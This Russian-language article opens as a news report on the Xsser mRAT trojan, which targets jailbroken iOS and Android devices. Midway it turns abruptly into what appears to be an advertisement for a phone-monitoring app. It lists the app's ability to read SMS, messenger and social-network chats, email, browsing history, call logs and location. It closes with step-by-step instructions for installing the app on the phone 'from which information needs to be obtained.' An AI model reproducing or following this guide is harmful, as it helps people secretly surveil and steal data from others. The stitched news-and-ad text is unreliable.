Xsser mRAT — троян, заражающий iOS

013 Сотрудники исследовательского центра Akamai Technologies опубликовали на своём официальном сайте отчёт, касающийся деятельности нового мобильного трояна Xsser mRAT. Его активность была замечена на платформе iOS. Также инфицирование производилось над Android устройствами, но общей статистики по этому вопросу пока не имеется. Как считает команда Akamai Prolexic, заражение и внедрение троянского коня происходит посредством фишинговых ресурсов, в которых используется принцип «человек посередине».

К созданию могла быть причастна киберпреступная группировка, целью которой является массовое хищение пользовательской информации для использования в личных целях. Велика вероятность использования Xsser mRAT и в качестве ПО, компрометирующего продукцию некоторых производителей мобильных устройств. Сюда относится и выполнение кода, который требуется разработчикам трояна. Удалённый запуск различных приложений мог приводить к различным ситуациям.

Впервые активность этого трояна была зафиксирована в октябре 2014 года, на территории Азии. Происходило заражение веб-страниц, атаковались и ресурсы производителей ПО. Для таких атак применялись сайты фишинговых компаний, специально созданные злоумышленниками. Специалисты Akamai подчёркивают, что C&C сервер был отключён, поэтому действительно массовых атак у трояна не получилось, и возможно уже не получится. Зато произошла модификация данного вируса, отныне он способен проникать в устройства на базе iOS, в которых ранее был сделан jailbreak.

Одним из источников распространения является репозиторий Cydia, где троян прячется под вполне легитимное и безопасное приложение. Огромная угроза для конфиденциальности пользовательской информации отныне стала суровой реальностью. Особенно неожиданным это выглядит для пользователей iOS, поскольку данная платформа считалась наиболее безопасной. При помощи трояна Xsser mRAT могут производиться DDoS-атаки, вороваться пароли и адреса посещаемых сайтов, слежение за вводимыми логинами и т.д.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.